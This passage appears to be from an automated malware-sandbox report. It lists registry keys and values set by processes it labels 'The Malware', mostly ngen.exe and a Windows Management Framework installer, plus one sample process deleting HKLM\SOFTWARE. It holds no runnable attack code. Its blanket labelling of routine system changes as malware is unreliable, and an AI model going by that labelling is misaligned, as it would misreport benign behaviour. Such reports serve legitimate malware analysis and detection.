"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:4092 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 E8 E5 E6 6E 56 16 E5 B1 B5 5A 7B CD 9C CF 64"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3576 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA F6 B5 10 FC 5B 76 42 69 BA B0 31 09 DD 2A 29"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:492 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 F6 B9 0D 74 1B 72 54 00 4C 9B F4 43 41 C3 59"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:364 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 3A F9 1E 81 89 E4 4F 1E C1 86 DD 28 EF F2 F5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3628 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 43 A1 F3 A1 68 DC D8 7A 00 92 8F 58 CF 32 6E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3600 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 32 1B 15 6A F6 36 03 C3 41 74 C7 AC 30 C7 EA"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3660 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5B 38 A9 8B 02 7F 4A 13 E2 B3 26 C2 42 DE 9E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3608 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 A8 C7 6B 9F 73 DE 91 7D EE C5 B6 5E 9B 6D E0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:1796 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 13 D0 73 EF AD 47 74 58 25 48 85 97 D7 8F D3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3524 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 BF A3 85 1A B4 42 15 67 A5 F2 93 97 0B 4C 26"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3644 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 3E 2A 39 28 CF 21 7F 7C 6B F3 11 6C 09 C1 AA"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3720 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C DB 2F 48 11 FC 47 A9 6D 4D ED 91 88 A3 64 A3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3704 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 19 E4 A8 62 37 71 B7 36 0A D0 AD B6 96 B7 11"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3560 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 58 B9 0D 8C F3 FA 8B 77 84 D8 80 96 D3 07 CC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3680 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 74 96 76 99 2E 96 4E 83 55 8C 35 7A 10 C1 F9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3548 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 49 58 84 58 76 BF 67 67 8F 92 2F 1D C2 9F 12"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process %original file name%.exe:792 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 F2 06 82 AD AC FC 07 E9 AC 29 A8 65 D4 FE 0C"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE]

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

The process update.exe:304 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

